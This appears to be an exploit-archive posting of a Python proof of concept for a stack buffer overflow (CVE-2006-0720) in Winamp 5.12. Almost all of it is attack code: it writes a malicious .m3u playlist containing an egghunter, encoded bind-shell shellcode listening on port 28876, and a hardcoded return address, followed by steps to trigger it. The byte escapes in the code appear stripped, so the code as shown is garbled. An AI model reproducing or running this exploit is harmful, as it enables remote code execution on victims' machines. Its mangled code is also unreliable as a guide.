Home / exploits Winamp 5.12 Buffer Overflow
Posted on 18 June 2013
# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow # Date: 16 June 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.winamp.com/ # Software Link: http://www.oldapps.com/winamp.php?old_winamp=211 # Version: 5.12 # Tested on: Windows XP Professional SP2, English # CVE: CVE-2006-0720 # BID: 16785 # # Description from CVE-2006-0720 # Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 # allows user-assisted attackers to cause a denial of service # (crash) and possibly execute arbitrary code via a crafted # .m3u file that causes an incorrect strncpy function call # when the player pauses or stops the file. # # # 1. Launch Winamp # 2. Drag boom.m3u into Winamp window # 3. Check for bind shell on port 28876 # import struct header = "#EXTM3U " header += "#EXTINF:1234,Pwnage Rock " # NTDisplayString egghunter = ( "x90" * 64 + "x66x81xcaxffx0fx42x52x6ax43x58" + "xcdx2ex3cx05x5ax74xefxb8" + "x77x30x30x74" + # w00t "x8bxfaxafx75xeaxafx75xe7xffxe7" + "x90" * 30 ) junk = "x41" * 262 + "x90" * 100 + egghunter # bind shell on port 28876 # https://code.google.com/p/w32-bind-ngs-shellcode/ # msfencode -i w32-bind-ngs-shellcode.bin -b "x00x0ax0dx5c" # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "w00tw00t" + "x90" * 239 + "xbfx26x63xb2x20xdaxccxd9x74x24xf4x5ax33xc9" + "xb1x36x83xeaxfcx31x7ax10x03x7ax10xc4x96x83" + "xe9x6cxd2x95xd9xe7x92x59x91x81x46xe9xcbx65" + "xfcx93x33xfex34x54x7bx18x4cx57xd2x70x9cxc8" + "xe6xb2x88x90x5exc5x3bx35xe8xa6xb5x5dx9fx5e" + "x70x5ex89x52x52xadx40x8dx73xdexf9x10x2dx60" + "xafxc5x9cxe1xa0xc5xbaxa9xb5x48xffxbex96x6f" + "x87xc1xcdx04x3cxe2x10xf3x95xd3xc0x41x91x20" + "x74x44x4bxfcx40xeaxa7x8cx84x36xfbx1fxa0x41" + "x3exc7x3fx46x61x8cx8bxbcx9fx7bx04x0bx8bx2a" + "x90x38xa8xcdx4fx37x38xcex8bxd6x12x51xadxd1" + "x11x5ax5fxbfxddx09xa0xefx89x38xdex31x45x36" + "x6ex13x04x47x40x06xa9x68xf4xd9x79x77x08x56" + "xb6xedxe7x3fx14xa4xf8x6fxe3x87x73x77xddxd5" + "x2exefx7dxb7xaaxcfx0cx3bx17x37xa4x6fxfcx81" + "xfdx86x02x59x85x65x21x36xdbxc7x7bx7ex9cx08" + "x73x29x71x85xd3x87x8ax7fx38xacx33x7cx29x78" + "x44x83x55" ) # 022B368C , call ecx , C:Progam FilesWinamppxsdkpls.dll ret = struct.pack("<I", 0x022B368C) # for some reason eip doesn't get overwritten and Winamp # crashes differently unless the 4th byte after ret is # a 0xB0. there's probably an easier way to do this but # this is what the fuzzer found first so... wtf = "x43x43x43xB0" f = open("boom.m3u", "w") f.write(header + junk + shellcode + ret + wtf) f.close() print "Created boom.m3u" print "1. Open Winamp" print "2. Drag boom.m3u into Winamp window" print "3. Check for bind shell on port 28876"
